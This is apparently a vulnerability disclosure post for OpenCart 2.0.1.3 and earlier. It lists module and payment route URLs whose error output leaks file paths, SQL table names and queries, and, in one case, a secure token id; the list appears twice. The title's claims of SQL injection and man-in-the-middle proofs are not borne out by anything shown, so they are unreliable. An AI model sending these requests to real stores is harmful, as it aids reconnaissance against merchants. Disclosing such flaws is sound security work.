Opencart <= 2.0.1.3 data leakage, path disclosure, sql tables disclosure, secure token id disclosure, man in the middle proof of concept, sql injection
http://localhost/ocit/index.php?route=module/banner
you can see a simple Notice: Undefined index: banner_id
http://localhost/ocit/index.php?route=module/bestseller
you can see a simple Notice: Undefined index: limit
http://localhost/ocit/index.php?route=module/carousel
you can see a simple Notice: Undefined index: banner_id
http://localhost/ocit/index.php?route=module/featured
you can see a simple Notice: Undefined index: limit
http://localhost/ocit/index.php?route=module/gallery (non stock extension/module)
you can see a simple Notice: Undefined index: filter_banner_id
http://localhost/ocit/index.php?route=module/news (non stock extension/module)
http://localhost/ocit/index.php?route=module/slideshow
http://localhost/ocit/index.php?route=module/special
http://localhost/ocit/index.php?route=payment/authorizenet_sim
http://localhost/ocit/index.php?route=payment/bluepay_hosted
http://localhost/ocit/index.php?route=payment/firstdata
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/globalpay
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/klarna_account
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/klarna_invoice
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/liqpay
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/nochex
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/paymate
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/paypoint
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/payza
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/pp_payflow
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/pp_payflow_iframe
http://localhost/ocit/index.php?route=payment/pp_standard
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/realex
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/realex_remote
http://localhost/ocit/index.php?route=payment/securetrading_pp
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/securetrading_ws
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/skrill
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/twocheckout
Notice: Undefined index: order_id
More info will be available later...
you can see a simple Notice: Undefined index: banner_id
http://localhost/ocit/index.php?route=module/bestseller
you can see a simple Notice: Undefined index: limit
http://localhost/ocit/index.php?route=module/carousel
you can see a simple Notice: Undefined index: banner_id
http://localhost/ocit/index.php?route=module/featured
you can see a simple Notice: Undefined index: limit
http://localhost/ocit/index.php?route=module/gallery (non stock extension/module)
you can see a simple Notice: Undefined index: filter_banner_id
http://localhost/ocit/index.php?route=module/news (non stock extension/module)
Notice: Error: Table 'test.oc_news' doesn't exist
Error No: 1146
SELECT * FROM oc_news n LEFT JOIN oc_news_description nd ON n.news_id = nd.news_id WHERE nd.language_id = '2' AND n.status = '1' ORDER BY date_added DESC LIMIT 0,5 in system\library\db\mysqli.php on line 41
Notice: Trying to get property of non-object in catalog\model\extension\news.php on line 26
Warning: Invalid argument supplied for foreach() in catalog\controller\module\news.php on line 19
http://localhost/ocit/index.php?route=module/slideshow
you can see a simple Notice: Undefined index: banner_id
http://localhost/ocit/index.php?route=module/special
Notice: Undefined index: limit in catalog\controller\module\special.php on line 24Notice: Undefined index: width in catalog\controller\module\special.php on line 32Notice: Undefined index: height in catalog\controller\module\special.php on line 32Warning: imagecreatetruecolor(): Invalid image dimensions in system\library\image.php on line 86Warning: imagecolorallocate() expects parameter 1 to be resource, boolean given in system\library\image.php on line 94Warning: imagefilledrectangle() expects parameter 1 to be resource, boolean given in system\library\image.php on line 97Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in system\library\image.php on line 99Notice: Undefined index: width in catalog\controller\module\special.php on line 32Notice: Undefined index: height in catalog\controller\module\special.php on line 32Warning: imagecreatetruecolor(): Invalid image dimensions in system\library\image.php on line 86Warning: imagecolorallocate() expects parameter 1 to be resource, boolean given in system\library\image.php on line 94Warning: imagefilledrectangle() expects parameter 1 to be resource, boolean given in system\library\image.php on line 97Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in system\library\image.php on line 99
http://localhost/ocit/index.php?route=payment/authorizenet_sim
Notice: Undefined index: order_id in catalog\controller\payment\authorizenet_sim.php on line 10Notice: Undefined index: order_id in catalog\controller\payment\authorizenet_sim.php on line 13Notice: Undefined index: order_id in catalog\controller\payment\authorizenet_sim.php on line 21
http://localhost/ocit/index.php?route=payment/bluepay_hosted
Fatal error: Class 'Controllerpaymentbluepayhosted' not found
http://localhost/ocit/index.php?route=payment/firstdata
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/globalpay
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/klarna_account
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/klarna_invoice
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/liqpay
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/nochex
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/paymate
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/paypoint
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/payza
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/pp_payflow
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/pp_payflow_iframe
Notice: Undefined index: order_id in catalog\controller\payment\pp_payflow_iframe.php on line 9Notice: Undefined index: order_id in catalog\controller\payment\pp_payflow_iframe.php on line 25
INSERT INTO `oc_paypal_payflow_iframe_order` SET `order_id` = '0', `secure_token_id` = 'f61192e89c716049bb146a7a91b2acfe' in system\library\db\mysqli.php on line 41Notice: Undefined index: code in catalog\controller\payment\pp_payflow_iframe.php on line 46Notice: Undefined index: iso_code_2 in catalog\controller\payment\pp_payflow_iframe.php on line 48
http://localhost/ocit/index.php?route=payment/pp_standard
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/realex
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/realex_remote
Warning: Invalid argument supplied for foreach() in catalog\controller\payment\realex_remote.php on line 32
http://localhost/ocit/index.php?route=payment/securetrading_pp
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/securetrading_ws
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/skrill
Notice: Undefined index: order_id
http://localhost/ocit/index.php?route=payment/twocheckout
Notice: Undefined index: order_id
More info will be available later...
Comments
Post a Comment